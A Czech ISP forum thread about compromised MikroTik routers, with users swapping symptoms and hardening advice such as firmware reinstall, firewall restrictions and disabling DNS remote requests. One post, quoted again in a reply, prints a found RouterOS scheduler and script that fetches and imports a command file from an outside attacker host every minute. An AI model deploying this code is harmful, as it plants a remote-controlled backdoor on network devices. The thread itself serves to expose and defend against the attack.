MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Návody a problémy s konfigurací.
Uživatelský avatar
okoun
Příspěvky: 6221
Registrován: 10 years ago
antispam: Ano
Bydliště: Mordor

Re: MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

Příspěvekod okoun » 2 months ago

protože dám ctrl+c a ctr+v dál neřeším :) pokud nějaký ftipálek odhlásí z newsu tak nevadí mám to dal dalších dovu emailů :D
0 x
Povoláním ISP není jen připojovat lidi k internetu, ale také jim dokázat vysvětlit, že bez pořádné investice do HW nelze udělat kvalitní přípojku a domácí síť...

Uživatelský avatar
hapi
Příspěvky: 12376
Registrován: 11 years ago
Kontaktovat uživatele:

Příspěvekod hapi » 2 months ago

měl si poslat jenom link na blog kde je vše.
0 x


shooter
Příspěvky: 750
Registrován: 10 years ago

Příspěvekod shooter » 2 months ago

jakej je exploit na 5.x verzi měl jsem napadenej routr ale nevím jak když nic nikde nepíšou takže asi není všechno uveřejněny
0 x

hocimin1
Příspěvky: 1147
Registrován: 12 years ago
Bydliště: Náchod

Příspěvekod hocimin1 » 2 months ago

tohle jsem dnes objevil na jednom RB SXT 5nD r2 verze 6.25.

Normalne se tam pak slo dostat z localu ne z WAN. Tak jsem to vsechno povypinal. Prehral na novejsi verzi.

Kód: Vybrat vše

/system scheduler
add disabled=yes interval=1m name=run1m on-event=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    jan/09/1970 start-time=21:04:13
/system script
add name=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive source="\
    \n/tool fetch url=http://core.zeroday.ltd/command.rsc\
    \n/import file-name=command.rsc"

Naposledy upravil(a) hocimin1 dne 05 Mar 2019 16:30, celkem upraveno 1 x.
1 x

mpcz
Příspěvky: 2615
Registrován: 13 years ago

Příspěvekod mpcz » 2 months ago

Chtělo by to připojit i nějakou podrobnost, hlavně verzi, stroj, atd. mpcz, 5mar2019
0 x

mladas
Příspěvky: 163
Registrován: 9 years ago
antispam: Ano

Příspěvekod mladas » 2 months ago

hocimin1 píše:tohle jsem dnes objevil na jednom RB SXT 5nD r2 verze 6.25.

Normalne se tam pak slo dostat z localu ne z WAN. Tak jsem to vsechno povypinal. Prehral na novejsi verzi.

Kód: Vybrat vše

/system scheduler
add disabled=yes interval=1m name=run1m on-event=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    jan/09/1970 start-time=21:04:13
/system script
add name=fetch policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive source="\
    \n/tool fetch url=http://core.zeroday.ltd/command.rsc\
    \n/import file-name=command.rsc"



hlavne se ti tam pridalo par mangli a par veci do natu a vypnul se ti fitewall na input, tezari to jsou ale netusim kde se tam vzali
0 x

dedek_2019
Příspěvky: 2
Registrován: 2 months ago

Příspěvekod dedek_2019 » 2 months ago

Zdar chlapi,
řeším od léta 2018 něco podobného s neustálými útoky na všechny MTK, které spravuji. Finálním a zatím funkčním řešením prozatím byla blokace na INPUT všech zahraničních IP adres a také blokace portu 53 (opět na INPUT). Tím jsem se zbavil všech útoků a byl klid. Problém nastal, když jsem zjistil, že díky blokaci DNS (port 53) mi např. nefungují zálohy NAS na servery jako Amazon či Google Drive... A to už je celkem problém. Snažil jsem se tedy "pogooglit" IP adresy oněch serverů, na které zálohy probíhají (s tím, že je přidám do výjimek), ale bohužel bez úspěchu. Zřejmě nemám všechny. Zálohy jsem tedy nouzově řešil vždy dočasným vypnutím blokace DNS, ale ejhle, dnes po 5-ti minutách MTK "zasyflený". Resp. útočník nestihl nahrát žádný script, ale stihl mi smazat všechna pravidla na FW. Takže toto dočasné řešení je dost nebezpečné :-)
Nemáte někdo jiný tip, jak toto obejít?

Díky moc,
Dědek.
0 x

mirek.k
Příspěvky: 703
Registrován: 11 years ago

Příspěvekod mirek.k » 2 months ago

Port 53 zvenku by neměl být potřeba, tedy měl by být zakázaný.
Jak to souvisí s NAS zálohami?
0 x

DarkLogic
Příspěvky: 1238
Registrován: 8 years ago

Příspěvekod DarkLogic » 2 months ago

mirek.k píše:Port 53 zvenku by neměl být potřeba, tedy měl by být zakázaný.
Jak to souvisí s NAS zálohami?


Asi zablokoval INPUT port 53 a nerozlisoval, jestli jde pozadavek z LAN nebo WAN.
0 x

Uživatelský avatar
hapi
Příspěvky: 12376
Registrován: 11 years ago
Kontaktovat uživatele:

Příspěvekod hapi » 2 months ago

to snad nemyslí vážně. Za chvíli se dozvíme že nezměnil hesla nebo má starý verze. Samozřejmě blokace dns zevnitř je blbost a nemusí se blokovat nic když není obsluha blbá a vypne "Allow remove Request" v nastevní DNS a upraví nastavení DHCP serveru aby dávalo třeba rovnou googlácký DNS. Jako škoda mluvit, začínám mít alergii na tyhle homo domo "síťaře". Moje rada zní, kup si router od UBNT.
1 x

CrazyApe
Příspěvky: 599
Registrován: 4 years ago

Příspěvekod CrazyApe » 2 months ago

dedek_2019 píše:Zdar chlapi,
řeším od léta 2018 něco podobného s neustálými útoky na všechny MTK, které spravuji. Finálním a zatím funkčním řešením prozatím byla blokace na INPUT všech zahraničních IP adres a také blokace portu 53 (opět na INPUT). Tím jsem se zbavil všech útoků a byl klid. Problém nastal, když jsem zjistil, že díky blokaci DNS (port 53) mi např. nefungují zálohy NAS na servery jako Amazon či Google Drive... A to už je celkem problém. Snažil jsem se tedy "pogooglit" IP adresy oněch serverů, na které zálohy probíhají (s tím, že je přidám do výjimek), ale bohužel bez úspěchu. Zřejmě nemám všechny. Zálohy jsem tedy nouzově řešil vždy dočasným vypnutím blokace DNS, ale ejhle, dnes po 5-ti minutách MTK "zasyflený". Resp. útočník nestihl nahrát žádný script, ale stihl mi smazat všechna pravidla na FW. Takže toto dočasné řešení je dost nebezpečné :-)
Nemáte někdo jiný tip, jak toto obejít?

Díky moc,
Dědek.


Problém je primárně v tom, že neumíte to zařízení nastavit. Tak jak psal někdo již níže doporučil bych aby jste si pořídil nějaký TP-Link, nebo Asus atp.. A nebo školení MikroTiku. Máme stovky kusů mikrotiků na veřejkách a nikdy žádnej problém. Takže začal bych asi tak:

- factory default
- netinstallem nejnovejší FW
- ponechat výchozí firewall z defconfu
- do něj přidat pravidlo na první místo input src adress (veřejka z které se na daný mikrotik potřebujete dostat z venku) port: 8291 protocol TCP+udp action accept
- nenastavovat DNS v ip-> DNS tam to nechat prázdné ale nastavit rozdávaní dns přimo z DHCP serveru (ip-> dhcp server-> network)
- ip services SSH,TELNET,FTP povolit jen z nejake adresy firewallem (opet pravidlo input src adress: x.x.x.x port :xx protocol acept)
- ip services WWW,API vypnout uplne
- nové heslo cisla,pismena + specialni znaky

To by mohlo pro začátek stačit.
1 x

dedek_2019
Příspěvky: 2
Registrován: 2 months ago

Příspěvekod dedek_2019 » 2 months ago

Hmm, tak díky za radu.... Jste fakt pašáci, poradili jste skvěle! Bylo rychlejší si najít tu drobnou chybku ve FW sám, než se jí dozvědět od vás.
Koukám, že podle osazenstva tohodle fóra, jsou zřejmě všichni méně zkušení uživatelé úplní idioti, co si neumí nastavit nový login...
Tak se tu bavte, "ajeťáci" :-)

hapi píše:to snad nemyslí vážně. Za chvíli se dozvíme že nezměnil hesla nebo má starý verze. Samozřejmě blokace dns zevnitř je blbost a nemusí se blokovat nic když není obsluha blbá a vypne "Allow remove Request" v nastevní DNS a upraví nastavení DHCP serveru aby dávalo třeba rovnou googlácký DNS. Jako škoda mluvit, začínám mít alergii na tyhle homo domo "síťaře". Moje rada zní, kup si router od UBNT.
0 x

Ladik
Příspěvky: 1357
Registrován: 9 years ago
antispam: Ano

Příspěvekod Ladik » 2 months ago

Kdyby jsi si přečetl trošku z tohoto vlákna bylo by ti to jasné.
Navíc ti tu jasně poradili, to menší rýpnutí nepočítám.
A jak jsi na tu "malou" chybku ve fw přišel? A jak opravil? Přeprogramoval jsi ROS?
Díky za odpověď "ajeťáku".
0 x

Uživatelský avatar
hapi
Příspěvky: 12376
Registrován: 11 years ago
Kontaktovat uživatele:

Příspěvekod hapi » 2 months ago

dedek_2019 píše:Hmm, tak díky za radu.... Jste fakt pašáci, poradili jste skvěle! Bylo rychlejší si najít tu drobnou chybku ve FW sám, než se jí dozvědět od vás.
Koukám, že podle osazenstva tohodle fóra, jsou zřejmě všichni méně zkušení uživatelé úplní idioti, co si neumí nastavit nový login...
Tak se tu bavte, "ajeťáci" :-)

hapi píše:to snad nemyslí vážně. Za chvíli se dozvíme že nezměnil hesla nebo má starý verze. Samozřejmě blokace dns zevnitř je blbost a nemusí se blokovat nic když není obsluha blbá a vypne "Allow remove Request" v nastevní DNS a upraví nastavení DHCP serveru aby dávalo třeba rovnou googlácký DNS. Jako škoda mluvit, začínám mít alergii na tyhle homo domo "síťaře". Moje rada zní, kup si router od UBNT.


kámo... co čteš v levém horní rohu tohohle fora? já tam čtu "poskytovatelé sobě" a už jenom fakt že se to tady jmenuje "ispforum" jaksi naznačuje že by se tu měli srocovat ISPíci což by mělo značit jistou úroveň znalostí která určitě zahrnuje správně zablokovat DNS dotazy z internetu velmi prostým pravidlem ve firewallu. Tim chci naznačit že tu neni support pro lidi jako si ty a proto se ti ani nikdo nesnažil polopatě napsat řešení.
0 x


Zpět na „Konfigurace“

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 2 hosti